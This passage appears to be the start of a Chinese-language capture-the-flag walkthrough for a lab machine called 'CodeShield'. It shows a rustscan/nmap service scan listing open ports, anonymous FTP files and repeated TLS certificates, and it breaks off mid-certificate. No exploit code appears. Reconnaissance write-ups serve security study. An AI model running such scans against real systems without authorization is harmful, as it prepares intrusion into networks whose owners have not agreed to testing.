![\"image-20250530092047669\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202505301612539.png\")
<\/div>\n
![\"image-20250530093428006\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202505301612540.png\")
<\/div>\n
![\"image-20250530093443117\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202505301612542.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ IP=10.0.2.22 \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\n\nOpen 10.0.2.22:21\nOpen 10.0.2.22:22\nOpen 10.0.2.22:25\nOpen 10.0.2.22:110\nOpen 10.0.2.22:143\nOpen 10.0.2.22:443\nOpen 10.0.2.22:465\nOpen 10.0.2.22:80\nOpen 10.0.2.22:587\nOpen 10.0.2.22:993\nOpen 10.0.2.22:995\nOpen 10.0.2.22:2222\nOpen 10.0.2.22:3389\nOpen 10.0.2.22:22222\n\nPORT STATE SERVICE REASON VERSION\n21\/tcp open ftp syn-ack vsftpd 3.0.5\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n| -rw-rw-r-- 1 1002 1002 2349914 Aug 30 2023 CodeShield_pitch_deck.pdf\n| -rw-rw-r-- 1 1003 1003 67520 Aug 28 2023 Information_Security_Policy.pdf\n|_-rw-rw-r-- 1 1004 1004 226435 Aug 28 2023 The_2023_weak_password_report.pdf\n| ftp-syst: \n| STAT: \n| FTP server status:\n| Connected to ::ffff:10.0.2.4\n| Logged in as ftp\n| TYPE: ASCII\n| No session bandwidth limit\n| Session timeout in seconds is 300\n| Control connection is plain text\n| Data connections will be plain text\n| At session startup, client count was 2\n| vsFTPd 3.0.5 - secure, fast, stable\n|_End of status\n22\/tcp open ssh syn-ack OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)\n| ssh-hostkey: \n| 2048 32:14:67:32:02:7a:b6:e4:7f:a7:22:0b:02:fd:ee:07 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuHgUlIwWnDaiir2GGz0SZ364+nUeN06MhKR1Ahpj0qttOmTUXB45W9LOLALPxvRIWFsE7b04T5MK4kCvM4VwKai+n6ON4kEkAqImw8UDpviFSLn5+A19IkBkiDPUtm2G\/DD+NTXj2w1TD2Pr1Wi6zY6tN3klkf6bkcszQ863BrGe5WHQhnNotc8+O5U8Fl01Fu46Pd6arpCpvaXgBL7h9eOcIHaTqComgbeDcrqmSiGM1RRzhh\/er1WtfClT0bFjSCaDe5NpE0Oat92xzFuQ62c3Z5hqDfYLh6mkFGH062Lc4xkGS84q2GByWzvKgxXtAGDURdxGkpo0H9FAmuaKb\n| 256 34:e4:d0:5d:bd:bc:9e:3f:4c:f9:1e:7d:3c:60:ce:6e (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKw9aldAVwBR4fxzLD1Dqr4iBFV11fNBaZ+8pX4f1HDbPEscd2BkHMsYxR17e0zpSttM6DSfKT+YbLu2lDHWHmg=\n| 256 ef:3c:ff:f9:9a:a3:aa:7d:5a:82:73:b9:8c:b8:97:04 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPXrs+Ma5M6viFKpjdt5NluM7u7W2jtKcyf4oe2UtFM+\n25\/tcp open smtp syn-ack Postfix smtpd\n|_smtp-commands: SMTP: EHLO 521 5.5.1 Protocol error\\x0D\n80\/tcp open http syn-ack nginx\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-title: Did not follow redirect to https:\/\/10.0.2.22\/\n110\/tcp open pop3 syn-ack Dovecot pop3d\n| ssl-cert: Subject: commonName=mail.codeshield.hmv\/organizationName=mail.codeshield.hmv\/stateOrProvinceName=GuangDong\/countryName=CN\/localityName=ShenZhen\/emailAddress=root@mail.codeshield.hmv\/organizationalUnitName=IT\n| Issuer: commonName=mail.codeshield.hmv\/organizationName=mail.codeshield.hmv\/stateOrProvinceName=GuangDong\/countryName=CN\/localityName=ShenZhen\/emailAddress=root@mail.codeshield.hmv\/organizationalUnitName=IT\n| Public Key type: rsa\n| Public Key bits: 4096\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2023-08-26T09:34:43\n| Not valid after: 2033-08-23T09:34:43\n| MD5: 04aa:3069:8114:4330:b40e:52bc:e802:f76c\n| SHA-1: a8d3:37d7:c10b:ea04:a17a:6199:fd81:ec6a:c56c:bd88\n| -----BEGIN CERTIFICATE-----\n| MIIGLzCCBBegAwIBAgIUe8PK2tPWbQYNvUv9OQ8b9fmcWJwwDQYJKoZIhvcNAQEL\n| BQAwgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0RvbmcxETAPBgNVBAcM\n| CFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12MQswCQYDVQQL\n| DAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUGCSqGSIb3DQEJ\n| ARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MB4XDTIzMDgyNjA5MzQ0M1oXDTMz\n| MDgyMzA5MzQ0M1owgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0Rvbmcx\n| ETAPBgNVBAcMCFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12\n| MQswCQYDVQQLDAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUG\n| CSqGSIb3DQEJARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MIICIjANBgkqhkiG\n| 9w0BAQEFAAOCAg8AMIICCgKCAgEAjElMTDo4Oe5q6AKX108lxiHdVqX4PLV50LFG\n| BogBdeU8K1DL6Leu5iMRJTl5JV83yjSUJ4qg+1O6VOjW49mqYc+mJDjTvKtHEn+v\n| H4SaOOj7fEmj0iFyKbrBr79S9icKOUk5maMvsjFmN2o2SIYsIV0TphbN+emeotCI\n| 9G21uKbaLLVI\/qOQosZLx+cZu1EZXsWCctFta67qzqAymbvx0BMB9zctIZy0bpmc\n| +WD4LPEqjSe09G9LnKthrcl94EMR+ITQKgcFVWfnXxrcs1TGSGdLeRbs1nRXzS2c\n| mQCns4N\/OnUTzURURsDoVzvedM+iBjSjK7fQpK71ME8hbqO0o+Vs1OYvo9Gc5jIJ\n| xkbQDIEmSmaeoMD\/Z6KownJP78C5+rlAyx+poMg0sDQDeAiNf9JjpDPDKbWaD3be\n| AZeBkJnCFIDYDQqiBdrtdS8alWp+tyDmLPs+0QvVinhv8QvkQO0zBqu6436lAO\/5\n| mTULHnvcduY4zQxh6HRx3xBjLX0y3dnVynLrSh+HzrWGpT8GId3ya+NzvidVNz7r\n| 08WF\/gFFt8n9RDdsvfkT7JlMeiyNc2AXcM+raoP92S\/+mCYuFfg5lx3ECV1piiW7\n| MFy8ZJsvllFfHFoQN1DxroqBiQqKCDwJ2TJfpa6n900fiD70fjEU+1EZKtFRbngj\n| snYppJMCAwEAAaNTMFEwHQYDVR0OBBYEFCv1rp3\/MwRFVlV1yx2+j4A\/1TPZMB8G\n| A1UdIwQYMBaAFCv1rp3\/MwRFVlV1yx2+j4A\/1TPZMA8GA1UdEwEB\/wQFMAMBAf8w\n| DQYJKoZIhvcNAQELBQADggIBAFkTH5QVtaciZ6+4PaABU4DXEzlue0UuABpByYTM\n| 3TRrK4MtlnnchHwofu6qK7E2qIAM\/E\/yheSh9N\/DKke8U3nAPYlcMVEtnygjS7fa\n| KLGvj2LNhNj+z8EjNZDA\/iQaz254EWrKw9hO6Tt\/\/c3qEiI6PrnvK3Soj9btcSne\n| oiXvnRvb49V4MBD\/1gjHg1nIhjlgxcjVBXSbl\/z2xBYHS58fwttmHkRIBxErVJdN\n| Xy4PckJUDFLD62DEYzPgDMXhLZCaAFbeUgMsmpY+HMPgmptp7UKC94sNw5Hvfq0U\n| dtBjSs33uZ+brNaqI+Y7QxWrl33exEhrjrUJ4UvCG8R\/+rlXrRJYWHKisujn+BCj\n| ZIVO9ZpeeecuAXKHgHKZLmF7hpJnQdDt5oTkqG4PmiNauG8bxF+eeZKn27wck5nR\n| oslJyh\/ZCYCjgUKG1FoqSYPd5LXBNLqld38DdoiQpCoqezQXtabdHOY1Syqprope\n| iVfG8NlOKXtTDcBOLkOVD\/DuiMQvsX8Zbg7FdkQ5cDubqO1cHd47kK0wiNrLVeEK\n| yxSEqTqsXnYPHTJkxkvbjJZB2ZBQXVnQkQM4Avm6OSD0K7Vglc\/15wYXlYarGgMH\n| sMDzpOY+uhmsu6CKsLufZaG4N8\/vbQWw73yqDpZgwqBi6ZPnw3JLJ5PnyHPtojTS\n| 1ZUy\n|_-----END CERTIFICATE-----\n|_ssl-date: TLS randomness does not represent time\n|_pop3-capabilities: TOP UIDL SASL STLS RESP-CODES CAPA AUTH-RESP-CODE PIPELINING\n143\/tcp open imap syn-ack Dovecot imapd (Ubuntu)\n|_imap-capabilities: IDLE SASL-IR more have ID post-login listed Pre-login ENABLE LOGINDISABLEDA0001 IMAP4rev1 capabilities OK LOGIN-REFERRALS LITERAL+ STARTTLS\n|_ssl-date: TLS randomness does not represent time\n| ssl-cert: Subject: commonName=mail.codeshield.hmv\/organizationName=mail.codeshield.hmv\/stateOrProvinceName=GuangDong\/countryName=CN\/localityName=ShenZhen\/emailAddress=root@mail.codeshield.hmv\/organizationalUnitName=IT\n| Issuer: commonName=mail.codeshield.hmv\/organizationName=mail.codeshield.hmv\/stateOrProvinceName=GuangDong\/countryName=CN\/localityName=ShenZhen\/emailAddress=root@mail.codeshield.hmv\/organizationalUnitName=IT\n| Public Key type: rsa\n| Public Key bits: 4096\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2023-08-26T09:34:43\n| Not valid after: 2033-08-23T09:34:43\n| MD5: 04aa:3069:8114:4330:b40e:52bc:e802:f76c\n| SHA-1: a8d3:37d7:c10b:ea04:a17a:6199:fd81:ec6a:c56c:bd88\n| -----BEGIN CERTIFICATE-----\n| MIIGLzCCBBegAwIBAgIUe8PK2tPWbQYNvUv9OQ8b9fmcWJwwDQYJKoZIhvcNAQEL\n| BQAwgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0RvbmcxETAPBgNVBAcM\n| CFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12MQswCQYDVQQL\n| DAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUGCSqGSIb3DQEJ\n| ARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MB4XDTIzMDgyNjA5MzQ0M1oXDTMz\n| MDgyMzA5MzQ0M1owgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0Rvbmcx\n| ETAPBgNVBAcMCFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12\n| MQswCQYDVQQLDAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUG\n| CSqGSIb3DQEJARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MIICIjANBgkqhkiG\n| 9w0BAQEFAAOCAg8AMIICCgKCAgEAjElMTDo4Oe5q6AKX108lxiHdVqX4PLV50LFG\n| BogBdeU8K1DL6Leu5iMRJTl5JV83yjSUJ4qg+1O6VOjW49mqYc+mJDjTvKtHEn+v\n| H4SaOOj7fEmj0iFyKbrBr79S9icKOUk5maMvsjFmN2o2SIYsIV0TphbN+emeotCI\n| 9G21uKbaLLVI\/qOQosZLx+cZu1EZXsWCctFta67qzqAymbvx0BMB9zctIZy0bpmc\n| +WD4LPEqjSe09G9LnKthrcl94EMR+ITQKgcFVWfnXxrcs1TGSGdLeRbs1nRXzS2c\n| mQCns4N\/OnUTzURURsDoVzvedM+iBjSjK7fQpK71ME8hbqO0o+Vs1OYvo9Gc5jIJ\n| xkbQDIEmSmaeoMD\/Z6KownJP78C5+rlAyx+poMg0sDQDeAiNf9JjpDPDKbWaD3be\n| AZeBkJnCFIDYDQqiBdrtdS8alWp+tyDmLPs+0QvVinhv8QvkQO0zBqu6436lAO\/5\n| mTULHnvcduY4zQxh6HRx3xBjLX0y3dnVynLrSh+HzrWGpT8GId3ya+NzvidVNz7r\n| 08WF\/gFFt8n9RDdsvfkT7JlMeiyNc2AXcM+raoP92S\/+mCYuFfg5lx3ECV1piiW7\n| MFy8ZJsvllFfHFoQN1DxroqBiQqKCDwJ2TJfpa6n900fiD70fjEU+1EZKtFRbngj\n| snYppJMCAwEAAaNTMFEwHQYDVR0OBBYEFCv1rp3\/MwRFVlV1yx2+j4A\/1TPZMB8G\n| A1UdIwQYMBaAFCv1rp3\/MwRFVlV1yx2+j4A\/1TPZMA8GA1UdEwEB\/wQFMAMBAf8w\n| DQYJKoZIhvcNAQELBQADggIBAFkTH5QVtaciZ6+4PaABU4DXEzlue0UuABpByYTM\n| 3TRrK4MtlnnchHwofu6qK7E2qIAM\/E\/yheSh9N\/DKke8U3nAPYlcMVEtnygjS7fa\n| KLGvj2LNhNj+z8EjNZDA\/iQaz254EWrKw9hO6Tt\/\/c3qEiI6PrnvK3Soj9btcSne\n| oiXvnRvb49V4MBD\/1gjHg1nIhjlgxcjVBXSbl\/z2xBYHS58fwttmHkRIBxErVJdN\n| Xy4PckJUDFLD62DEYzPgDMXhLZCaAFbeUgMsmpY+HMPgmptp7UKC94sNw5Hvfq0U\n| dtBjSs33uZ+brNaqI+Y7QxWrl33exEhrjrUJ4UvCG8R\/+rlXrRJYWHKisujn+BCj\n| ZIVO9ZpeeecuAXKHgHKZLmF7hpJnQdDt5oTkqG4PmiNauG8bxF+eeZKn27wck5nR\n| oslJyh\/ZCYCjgUKG1FoqSYPd5LXBNLqld38DdoiQpCoqezQXtabdHOY1Syqprope\n| iVfG8NlOKXtTDcBOLkOVD\/DuiMQvsX8Zbg7FdkQ5cDubqO1cHd47kK0wiNrLVeEK\n| yxSEqTqsXnYPHTJkxkvbjJZB2ZBQXVnQkQM4Avm6OSD0K7Vglc\/15wYXlYarGgMH\n| sMDzpOY+uhmsu6CKsLufZaG4N8\/vbQWw73yqDpZgwqBi6ZPnw3JLJ5PnyHPtojTS\n| 1ZUy\n|_-----END CERTIFICATE-----\n443\/tcp open ssl\/http syn-ack nginx\n| ssl-cert: Subject: commonName=mail.codeshield.hmv\/organizationName=mail.codeshield.hmv\/stateOrProvinceName=GuangDong\/countryName=CN\/localityName=ShenZhen\/emailAddress=root@mail.codeshield.hmv\/organizationalUnitName=IT\n| Issuer: commonName=mail.codeshield.hmv\/organizationName=mail.codeshield.hmv\/stateOrProvinceName=GuangDong\/countryName=CN\/localityName=ShenZhen\/emailAddress=root@mail.codeshield.hmv\/organizationalUnitName=IT\n| Public Key type: rsa\n| Public Key bits: 4096\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2023-08-26T09:34:43\n| Not valid after: 2033-08-23T09:34:43\n| MD5: 04aa:3069:8114:4330:b40e:52bc:e802:f76c\n| SHA-1: a8d3:37d7:c10b:ea04:a17a:6199:fd81:ec6a:c56c:bd88\n| -----BEGIN CERTIFICATE-----\n| MIIGLzCCBBegAwIBAgIUe8PK2tPWbQYNvUv9OQ8b9fmcWJwwDQYJKoZIhvcNAQEL\n| BQAwgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0RvbmcxETAPBgNVBAcM\n| CFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12MQswCQYDVQQL\n| DAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUGCSqGSIb3DQEJ\n| ARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MB4XDTIzMDgyNjA5MzQ0M1oXDTMz\n| MDgyMzA5MzQ0M1owgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0Rvbmcx\n| ETAPBgNVBAcMCFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12\n| MQswCQYDVQQLDAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUG\n| CSqGSIb3DQEJARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MIICIjANBgkqhkiG\n| 9w0BAQEFAAOCAg8AMIICCgKCAgEAjElMTDo4Oe5q6AKX108lxiHdVqX4PLV50LFG\n| BogBdeU8K1DL6Leu5iMRJTl5JV83yjSUJ4qg+1O6VOjW49mqYc+mJDjTvKtHEn+v\n| H4SaOOj7fEmj0iFyKbrBr79S9icKOUk5maMvsjFmN2o2SIYsIV0TphbN+emeotCI\n| 9G21uKbaLLVI\/qOQosZLx+cZu1EZXsWCctFta67qzqAymbvx0BMB9zctIZy0bpmc\n| +WD4LPEqjSe09G9LnKthrcl94EMR+ITQKgcFVWfnXxrcs1TGSGdLeRbs1nRXzS2c\n| mQCns4N\/OnUTzURURsDoVzvedM+iBjSjK7fQpK71ME8hbqO0o+Vs1OYvo9Gc5jIJ\n| xkbQDIEmSmaeoMD\/Z6KownJP78C5+rlAyx+poMg0sDQDeAiNf9JjpDPDKbWaD3be\n| AZeBkJnCFIDYDQqiBdrtdS8alWp+tyDmLPs+0QvVinhv8QvkQO0zBqu6436lAO\/5\n| mTULHnvcduY4zQxh6HRx3xBjLX0y3dnVynLrSh+HzrWGpT8GId3ya+NzvidVNz7r\n| 08WF\/gFFt8n9RDdsvfkT7JlMeiyNc2AXcM+raoP92S\/+mCYuFfg5lx3ECV1piiW7\n| MFy8ZJsvllFfHFoQN1DxroqBiQqKCDwJ2TJfpa6n900fiD70fjEU+1EZKtFRbngj\n| snYppJMCAwEAAaNTMFEwHQYDVR0OBBYEFCv1rp3\/MwRFVlV1yx2+j4A\/1TPZMB8G\n| A1UdIwQYMBaAFCv1rp3\/MwRFVlV1yx2+j4A\/1TPZMA8GA1UdEwEB\/wQFMAMBAf8w\n| DQYJKoZIhvcNAQELBQADggIBAFkTH5QVtaciZ6+4PaABU4DXEzlue0UuABpByYTM\n| 3TRrK4MtlnnchHwofu6qK7E2qIAM\/E\/yheSh9N\/DKke8U3nAPYlcMVEtnygjS7fa\n| KLGvj2LNhNj+z8EjNZDA\/iQaz254EWrKw9hO6Tt\/\/c3qEiI6PrnvK3Soj9btcSne\n| oiXvnRvb49V4MBD\/1gjHg1nIhjlgxcjVBXSbl\/z2xBYHS58fwttmHkRIBxErVJdN\n| Xy4PckJUDFLD62DEYzPgDMXhLZCaAFbeUgMsmpY+HMPgmptp7UKC94sNw5Hvfq0U\n| dtBjSs33uZ+brNaqI+Y7QxWrl33exEhrjrUJ4UvCG8R\/+rlXrRJYWHKisujn+BCj\n| ZIVO9ZpeeecuAXKHgHKZLmF7hpJnQdDt5oTkqG4PmiNauG8bxF+eeZKn27wck5nR\n| oslJyh\/ZCYCjgUKG1FoqSYPd5LXBNLqld38DdoiQpCoqezQXtabdHOY1Syqprope\n| iVfG8NlOKXtTDcBOLkOVD\/DuiMQvsX8Zbg7FdkQ5cDubqO1cHd47kK0wiNrLVeEK\n| yxSEqTqsXnYPHTJkxkvbjJZB2ZBQXVnQkQM4Avm6OSD0K7Vglc\/15wYXlYarGgMH\n| sMDzpOY+uhmsu6CKsLufZaG4N8\/vbQWw73yqDpZgwqBi6ZPnw3JLJ5PnyHPtojTS\n| 1ZUy\n|_-----END CERTIFICATE-----\n|_http-title: CodeShield - Home\n|_http-favicon: Unknown favicon MD5: 6BA827A71F6ECC3A5A21495F05755824\n|_ssl-date: TLS randomness does not represent time\n| http-methods: \n|_ Supported Methods: GET HEAD\n| http-robots.txt: 1 disallowed entry \n|_\/\n465\/tcp open ssl\/smtp syn-ack Postfix smtpd\n| ssl-cert: Subject: commonName=mail.codeshield.hmv\/organizationName=mail.codeshield.hmv\/stateOrProvinceName=GuangDong\/countryName=CN\/localityName=ShenZhen\/emailAddress=root@mail.codeshield.hmv\/organizationalUnitName=IT\n| Issuer: commonName=mail.codeshield.hmv\/organizationName=mail.codeshield.hmv\/stateOrProvinceName=GuangDong\/countryName=CN\/localityName=ShenZhen\/emailAddress=root@mail.codeshield.hmv\/organizationalUnitName=IT\n| Public Key type: rsa\n| Public Key bits: 4096\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2023-08-26T09:34:43\n| Not valid after: 2033-08-23T09:34:43\n| MD5: 04aa:3069:8114:4330:b40e:52bc:e802:f76c\n| SHA-1: a8d3:37d7:c10b:ea04:a17a:6199:fd81:ec6a:c56c:bd88\n| -----BEGIN CERTIFICATE-----\n| MIIGLzCCBBegAwIBAgIUe8PK2tPWbQYNvUv9OQ8b9fmcWJwwDQYJKoZIhvcNAQEL\n| BQAwgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0RvbmcxETAPBgNVBAcM\n| CFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12MQswCQYDVQQL\n| DAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUGCSqGSIb3DQEJ\n| ARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MB4XDTIzMDgyNjA5MzQ0M1oXDTMz\n| MDgyMzA5MzQ0M1owgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0Rvbmcx\n| ETAPBgNVBAcMCFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12\n| MQswCQYDVQQLDAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUG\n| CSqGSIb3DQEJARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MIICIjANBgkqhkiG\n| 9w0BAQEFAAOCAg8AMIICCgKCAgEAjElMTDo4Oe5q6AKX108lxiHdVqX4PLV50LFG\n| BogBdeU8K1DL6Leu5iMRJTl5JV83yjSUJ4qg+1O6VOjW49mqYc+mJDjTvKtHEn+v\n| H4SaOOj7fEmj0iFyKbrBr79S9icKOUk5maMvsjFmN2o2SIYsIV0TphbN+emeotCI\n| 9G21uKbaLLVI\/qOQosZLx+cZu1EZXsWCctFta67qzqAymbvx0BMB9zctIZy0bpmc\n| +WD4LPEqjSe09G9LnKthrcl94EMR+ITQKgcFVWfnXxrcs1TGSGdLeRbs1nRXzS2c\n| mQCns4N\/OnUTzURURsDoVzvedM+iBjSjK7fQpK71ME8hbqO0o+Vs1OYvo9Gc5jIJ\n| xkbQDIEmSmaeoMD\/Z6KownJP78C5+rlAyx+poMg0sDQDeAiNf9JjpDPDKbWaD3be\n| AZeBkJnCFIDYDQqiBdrtdS8alWp+tyDmLPs+0QvVinhv8QvkQO0zBqu6436lAO\/5\n| mTULHnvcduY4zQxh6HRx3xBjLX0y3dnVynLrSh+HzrWGpT8GId3ya+NzvidVNz7r\n| 08WF\/gFFt8n9RDdsvfkT7JlMeiyNc2AXcM+raoP92S\/+mCYuFfg5lx3ECV1piiW7\n| MFy8ZJsvllFfHFoQN1DxroqBiQqKCDwJ2TJfpa6n900fiD70fjEU+1EZKtFRbngj\n| snYppJMCAwEAAaNTMFEwHQYDVR0OBBYEFCv1rp3\/MwRFVlV1yx2+j4A\/1TPZMB8G\n| A1UdIwQYMBaAFCv1rp3\/MwRFVlV1yx2+j4A\/1TPZMA8GA1UdEwEB\/wQFMAMBAf8w\n| DQYJKoZIhvcNAQELBQADggIBAFkTH5QVtaciZ6+4PaABU4DXEzlue0UuABpByYTM\n| 3TRrK4MtlnnchHwofu6qK7E2qIAM\/E\/yheSh9N\/DKke8U3nAPYlcMVEtnygjS7fa\n| KLGvj2LNhNj+z8EjNZDA\/iQaz254EWrKw9hO6Tt\/\/c3qEiI6PrnvK3Soj9btcSne\n| oiXvnRvb49V4MBD\/1gjHg1nIhjlgxcjVBXSbl\/z2xBYHS58fwttmHkRIBxErVJdN\n| Xy4PckJUDFLD62DEYzPgDMXhLZCaAFbeUgMsmpY+HMPgmptp7UKC94sNw5Hvfq0U\n| dtBjSs33uZ+brNaqI+Y7QxWrl33exEhrjrUJ4UvCG8R\/+rlXrRJYWHKisujn+BCj\n| ZIVO9ZpeeecuAXKHgHKZLmF7hpJnQdDt5oTkqG4PmiNauG8bxF+eeZKn27wck5nR\n| oslJyh\/ZCYCjgUKG1FoqSYPd5LXBNLqld38DdoiQpCoqezQXtabdHOY1Syqprope\n| iVfG8NlOKXtTDcBOLkOVD\/DuiMQvsX8Zbg7FdkQ5cDubqO1cHd47kK0wiNrLVeEK\n| yxSEqTqsXnYPHTJkxkvbjJZB2ZBQXVnQkQM4Avm6OSD0K7Vglc\/15wYXlYarGgMH\n| sMDzpOY+uhmsu6CKsLufZaG4N8\/vbQWw73yqDpZgwqBi6ZPnw3JLJ5PnyHPtojTS\n| 1ZUy\n|_-----END CERTIFICATE-----\n|_smtp-commands: mail.codeshield.hmv, PIPELINING, SIZE 15728640, ETRN, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING\n|_ssl-date: TLS randomness does not represent time\n587\/tcp open smtp syn-ack Postfix smtpd\n| ssl-cert: Subject: commonName=mail.codeshield.hmv\/organizationName=mail.codeshield.hmv\/stateOrProvinceName=GuangDong\/countryName=CN\/localityName=ShenZhen\/emailAddress=root@mail.codeshield.hmv\/organizationalUnitName=IT\n| Issuer: commonName=mail.codeshield.hmv\/organizationName=mail.codeshield.hmv\/stateOrProvinceName=GuangDong\/countryName=CN\/localityName=ShenZhen\/emailAddress=root@mail.codeshield.hmv\/organizationalUnitName=IT\n| Public Key type: rsa\n| Public Key bits: 4096\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2023-08-26T09:34:43\n| Not valid after: 2033-08-23T09:34:43\n| MD5: 04aa:3069:8114:4330:b40e:52bc:e802:f76c\n| SHA-1: a8d3:37d7:c10b:ea04:a17a:6199:fd81:ec6a:c56c:bd88\n| -----BEGIN CERTIFICATE-----\n| MIIGLzCCBBegAwIBAgIUe8PK2tPWbQYNvUv9OQ8b9fmcWJwwDQYJKoZIhvcNAQEL\n| BQAwgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0RvbmcxETAPBgNVBAcM\n| CFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12MQswCQYDVQQL\n| DAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUGCSqGSIb3DQEJ\n| ARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MB4XDTIzMDgyNjA5MzQ0M1oXDTMz\n| MDgyMzA5MzQ0M1owgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0Rvbmcx\n| ETAPBgNVBAcMCFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12\n| MQswCQYDVQQLDAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUG\n| CSqGSIb3DQEJARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MIICIjANBgkqhkiG\n| 9w0BAQEFAAOCAg8AMIICCgKCAgEAjElMTDo4Oe5q6AKX108lxiHdVqX4PLV50LFG\n| BogBdeU8K1DL6Leu5iMRJTl5JV83yjSUJ4qg+1O6VOjW49mqYc+mJDjTvKtHEn+v\n| H4SaOOj7fEmj0iFyKbrBr79S9icKOUk5maMvsjFmN2o2SIYsIV0TphbN+emeotCI\n| 9G21uKbaLLVI\/qOQosZLx+cZu1EZXsWCctFta67qzqAymbvx0BMB9zctIZy0bpmc\n| +WD4LPEqjSe09G9LnKthrcl94EMR+ITQKgcFVWfnXxrcs1TGSGdLeRbs1nRXzS2c\n| mQCns4N\/OnUTzURURsDoVzvedM+iBjSjK7fQpK71ME8hbqO0o+Vs1OYvo9Gc5jIJ\n| xkbQDIEmSmaeoMD\/Z6KownJP78C5+rlAyx+poMg0sDQDeAiNf9JjpDPDKbWaD3be\n| AZeBkJnCFIDYDQqiBdrtdS8alWp+tyDmLPs+0QvVinhv8QvkQO0zBqu6436lAO\/5\n| mTULHnvcduY4zQxh6HRx3xBjLX0y3dnVynLrSh+HzrWGpT8GId3ya+NzvidVNz7r\n| 08WF\/gFFt8n9RDdsvfkT7JlMeiyNc2AXcM+raoP92S\/+mCYuFfg5lx3ECV1piiW7\n| MFy8ZJsvllFfHFoQN1DxroqBiQqKCDwJ2TJfpa6n900fiD70fjEU+1EZKtFRbngj\n| snYppJMCAwEAAaNTMFEwHQYDVR0OBBYEFCv1rp3\/MwRFVlV1yx2+j4A\/1TPZMB8G\n| A1UdIwQYMBaAFCv1rp3\/MwRFVlV1yx2+j4A\/1TPZMA8GA1UdEwEB\/wQFMAMBAf8w\n| 